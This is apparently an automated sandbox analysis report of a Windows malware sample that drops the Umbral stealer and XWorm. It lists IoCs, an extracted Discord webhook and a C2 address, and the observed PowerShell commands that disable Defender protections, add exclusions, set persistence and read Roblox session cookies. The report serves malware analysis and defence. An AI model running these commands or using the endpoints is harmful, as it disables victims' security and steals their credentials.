Analysis
-
max time kernel
148s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
23-02-2025 10:42
Static task
static1
Behavioral task
behavioral1
Sample
obxod266dev.exe
Resource
win10ltsc2021-20250217-en
Behavioral task
behavioral2
Sample
obxod266dev.exe
Resource
win7-20241010-en
Behavioral task
behavioral3
Sample
obxod266dev.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral4
Sample
obxod266dev.exe
Resource
win10ltsc2021-20250217-en
General
-
Target
obxod266dev.exe
-
Size
329KB
-
MD5
31fc82eeaed45f2389b57ffb9d8f6ea2
-
SHA1
fd46d4e307b09a372a3bfc0d88b87eeccaf77912
-
SHA256
dc7f8c7c39bb043da2c19a03504c499e0af367fefee810a8190c1119992e2248
-
SHA512
418bca3b27a8354e559de8e1333ebc8ff42a5d4f07b42a0ec95775c9a52feb1d61a00006ceefef3be8e30dc07c0fb3123440413a2b16d8d9cc6e468cb9d5c962
-
SSDEEP
6144:3aDaK7MooumCpZSApAWl2IenY7YDlw+JmS1r8+CMCX:3LK7sk2IKYkp/mYPCX
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1342862584386420817/8iDLBPWkMbkgW0Lx9Tlnezr6EGJYKsdRBZ8GJHI66h0NchvKorRU-U6oiQsKR-OZeqD9
Extracted
xworm
25.ip.gl.ply.gg:59054
-
Install_directory
%AppData%
-
install_file
svchost.exe
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral3/memory/1132-25-0x00000229A1440000-0x00000229A1480000-memory.dmp family_umbral behavioral3/files/0x000b000000023c41-22.dat family_umbral -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral3/files/0x000c000000023bea-6.dat family_xworm behavioral3/memory/4052-26-0x0000000000E40000-0x0000000000E5A000-memory.dmp family_xworm -
Umbral family
-
Xworm family
-
pid Process 4548 powershell.exe 4768 powershell.exe 3612 powershell.exe 3456 powershell.exe 4444 powershell.exe 4952 powershell.exe 1136 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation obxod266dev.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation obxod 266dev.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk obxod 266dev.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk obxod 266dev.exe -
Executes dropped EXE 2 IoCs
pid Process 4052 obxod 266dev.exe 1132 Umbral.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" obxod 266dev.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com 23 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 3612 powershell.exe 3612 powershell.exe 3456 powershell.exe 3456 powershell.exe 4444 powershell.exe 4444 powershell.exe 4952 powershell.exe 4952 powershell.exe 4052 obxod 266dev.exe 1132 Umbral.exe 1136 powershell.exe 1136 powershell.exe 4548 powershell.exe 4548 powershell.exe 4768 powershell.exe 4768 powershell.exe 4404 powershell.exe 4404 powershell.exe -
Suspicious use of AdjustPrivilegeToken 53 IoCs
description pid Process Token: SeDebugPrivilege 4052 obxod 266dev.exe Token: SeDebugPrivilege 1132 Umbral.exe Token: SeIncreaseQuotaPrivilege 3248 wmic.exe Token: SeSecurityPrivilege 3248 wmic.exe Token: SeTakeOwnershipPrivilege 3248 wmic.exe Token: SeLoadDriverPrivilege 3248 wmic.exe Token: SeSystemProfilePrivilege 3248 wmic.exe Token: SeSystemtimePrivilege 3248 wmic.exe Token: SeProfSingleProcessPrivilege 3248 wmic.exe Token: SeIncBasePriorityPrivilege 3248 wmic.exe Token: SeCreatePagefilePrivilege 3248 wmic.exe Token: SeBackupPrivilege 3248 wmic.exe Token: SeRestorePrivilege 3248 wmic.exe Token: SeShutdownPrivilege 3248 wmic.exe Token: SeDebugPrivilege 3248 wmic.exe Token: SeSystemEnvironmentPrivilege 3248 wmic.exe Token: SeRemoteShutdownPrivilege 3248 wmic.exe Token: SeUndockPrivilege 3248 wmic.exe Token: SeManageVolumePrivilege 3248 wmic.exe Token: 33 3248 wmic.exe Token: 34 3248 wmic.exe Token: 35 3248 wmic.exe Token: 36 3248 wmic.exe Token: SeIncreaseQuotaPrivilege 3248 wmic.exe Token: SeSecurityPrivilege 3248 wmic.exe Token: SeTakeOwnershipPrivilege 3248 wmic.exe Token: SeLoadDriverPrivilege 3248 wmic.exe Token: SeSystemProfilePrivilege 3248 wmic.exe Token: SeSystemtimePrivilege 3248 wmic.exe Token: SeProfSingleProcessPrivilege 3248 wmic.exe Token: SeIncBasePriorityPrivilege 3248 wmic.exe Token: SeCreatePagefilePrivilege 3248 wmic.exe Token: SeBackupPrivilege 3248 wmic.exe Token: SeRestorePrivilege 3248 wmic.exe Token: SeShutdownPrivilege 3248 wmic.exe Token: SeDebugPrivilege 3248 wmic.exe Token: SeSystemEnvironmentPrivilege 3248 wmic.exe Token: SeRemoteShutdownPrivilege 3248 wmic.exe Token: SeUndockPrivilege 3248 wmic.exe Token: SeManageVolumePrivilege 3248 wmic.exe Token: 33 3248 wmic.exe Token: 34 3248 wmic.exe Token: 35 3248 wmic.exe Token: 36 3248 wmic.exe Token: SeDebugPrivilege 3612 powershell.exe Token: SeDebugPrivilege 3456 powershell.exe Token: SeDebugPrivilege 4444 powershell.exe Token: SeDebugPrivilege 4952 powershell.exe Token: SeDebugPrivilege 4052 obxod 266dev.exe Token: SeDebugPrivilege 1136 powershell.exe Token: SeDebugPrivilege 4548 powershell.exe Token: SeDebugPrivilege 4768 powershell.exe Token: SeDebugPrivilege 4404 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4052 obxod 266dev.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2408 wrote to memory of 4052 2408 obxod266dev.exe 85 PID 2408 wrote to memory of 4052 2408 obxod266dev.exe 85 PID 2408 wrote to memory of 1132 2408 obxod266dev.exe 86 PID 2408 wrote to memory of 1132 2408 obxod266dev.exe 86 PID 1132 wrote to memory of 3248 1132 Umbral.exe 89 PID 1132 wrote to memory of 3248 1132 Umbral.exe 89 PID 4052 wrote to memory of 3612 4052 obxod 266dev.exe 95 PID 4052 wrote to memory of 3612 4052 obxod 266dev.exe 95 PID 4052 wrote to memory of 3456 4052 obxod 266dev.exe 97 PID 4052 wrote to memory of 3456 4052 obxod 266dev.exe 97 PID 4052 wrote to memory of 4444 4052 obxod 266dev.exe 99 PID 4052 wrote to memory of 4444 4052 obxod 266dev.exe 99 PID 4052 wrote to memory of 4952 4052 obxod 266dev.exe 101 PID 4052 wrote to memory of 4952 4052 obxod 266dev.exe 101 PID 1132 wrote to memory of 4328 1132 Umbral.exe 103 PID 1132 wrote to memory of 4328 1132 Umbral.exe 103 PID 1132 wrote to memory of 1136 1132 Umbral.exe 105 PID 1132 wrote to memory of 1136 1132 Umbral.exe 105 PID 1132 wrote to memory of 4548 1132 Umbral.exe 107 PID 1132 wrote to memory of 4548 1132 Umbral.exe 107 PID 1132 wrote to memory of 4768 1132 Umbral.exe 109 PID 1132 wrote to memory of 4768 1132 Umbral.exe 109 PID 1132 wrote to memory of 4404 1132 Umbral.exe 111 PID 1132 wrote to memory of 4404 1132 Umbral.exe 111 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4328 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\obxod266dev.exe"C:\Users\Admin\AppData\Local\Temp\obxod266dev.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Users\Admin\AppData\Roaming\obxod 266dev.exe"C:\Users\Admin\AppData\Roaming\obxod 266dev.exe"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4052 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\obxod 266dev.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'obxod 266dev.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4444
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4952
-
-
-
C:\Users\Admin\AppData\Roaming\Umbral.exe"C:\Users\Admin\AppData\Roaming\Umbral.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3248
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\Umbral.exe"3⤵
- Views/modifies file attributes
PID:4328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Umbral.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1136
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4548
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4404
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5cc19bcff372d20459d3651ba8aef50e7
SHA13c6f1d4cdd647864fb97a16b1aefba67fcee11f7
SHA256366473e774d8976c7fd4dc582220666fb61a4feb3f7c95e69b2a68ad9e446ec9
SHA512a0e360ca4b6e874fd44612bf4b17f3722c0619da4f6bade12a62efadae88c2d33460114eaafa2bc3fb1cef5bea07e745b8bee24f15d0cacaff5f4a521b225080
-
Filesize
948B
MD547aec0ae6e0dfab5f91c35cd65d2c56a
SHA10bbe13618bdc0c402539cdfca81471aa501f5cad
SHA2568f31385012b247db2cc50ecb164208fbbf5f8cdf7bfc951e8c2c8ad5fb04cf0b
SHA512c4b7184a85c1d594012ba86390e651439d6cae63c76b94432faaaea410e4ef9bc62d88e68adf8f3abbe36e18ef9e4dc46c3e31a0d72089f98a22f04c8b4a8f12
-
Filesize
1KB
MD5548dd08570d121a65e82abb7171cae1c
SHA11a1b5084b3a78f3acd0d811cc79dbcac121217ab
SHA256cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc
SHA51237b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
944B
MD565a68df1062af34622552c4f644a5708
SHA16f6ecf7b4b635abb0b132d95dac2759dc14b50af
SHA256718dc2f5f4a6dbb7fab7f3db05bd7f602fb16526caae7084ab46c3ab4e7bad35
SHA5124e460eb566032942547b58411222dd26ae300a95f83cf5ae6df58ebd28594341123611b348bd4031a33bc7f38307d5cb8fb677bba8c896919e3eee677a104d4d
-
Filesize
944B
MD567e8893616f805af2411e2f4a1411b2a
SHA139bf1e1a0ddf46ce7c136972120f512d92827dcd
SHA256ca0dfe104c1bf27f7e01999fcdabc16c6400c3da937c832c26bdbca322381d31
SHA512164e911a9935e75c8be1a6ec3d31199a16ba2a1064da6c09d771b2a38dd7fddd142301ef55d67d90f306d3a454a1ce7b72e129ea42e44500b9b8c623a8d98b4d
-
Filesize
944B
MD5ef72c47dbfaae0b9b0d09f22ad4afe20
SHA15357f66ba69b89440b99d4273b74221670129338
SHA256692ec20c7039170fb199510f0436181fd155e6b4516d4d1c9e1675adf99aaa7f
SHA5127514b6bc8dc39fa618223300be27cd535dc35b18c66b4a089e2302e72b3e0cac06d88a989fa1296feb386b3cbe2084019df6430c7f895071b76e04ce559a30b4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
232KB
MD5e486d8aafa368a43a56987dd4d80aa75
SHA18851fe89928a47a58b50348d9a4458f24e2725f9
SHA256596ac7d2aa525ceb7b82aec1e6376d34f36649f028de442fb0a0021e380db136
SHA512abe413e1277c0ac103778822dcd3f6b03f315fad83731af10284a68fca8ecfa2d2c6b9d9c3e0ec55803a2b31d03ae9c863c430eba23954ccc5f82b2a6d21e573
-
Filesize
80KB
MD53598f860aacfe53b00c305715a6c7b2f
SHA170640b2e8a71017cdf5fb8e91fe0b065f89a064b
SHA256b4b8385381c3bb23d821f179a73ff19083d15f7cc6e1c9cc2235da3c382db241
SHA5120b2bfa9e701ba126acb6bf9b9b5df26e8558a59708659ec2981173267d277f44e6b6575f1ceb945a86705796ea8f50c5cd1617ee45fdaabdc68af9b2022e654c